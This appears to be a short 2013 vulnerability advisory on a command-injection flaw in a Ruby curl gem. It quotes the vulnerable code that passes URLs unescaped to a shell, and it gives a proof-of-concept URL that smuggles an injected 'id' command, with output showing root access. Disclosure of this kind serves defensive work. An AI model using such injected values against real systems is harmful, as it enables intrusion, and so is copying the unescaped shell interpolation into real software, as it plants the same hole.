Ruby Gem Curl Command Execution



EKU-ID: 3083 CVE: OSVDB-ID:
Author: Larry W. Cashdollar Published: 2013-03-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Curl Ruby Gem Remote command execution
3/12/2013

https://github.com/tg0/curl

Specially crafted URLs can result in remote code execution:

In ./lib/curl.rb the following lines:

131       cmd = "curl #{cookies_store} #{browser_type} #{@setup_params} {ref}  \"{url}\"  "
132         if @debug
133                 puts cmd.red
134         end
135         result = open_pipe(cmd)

PoC:

page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")

larry@underfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)

Larry W. Cashdollar
@_larry0
http://vapid.dhs.org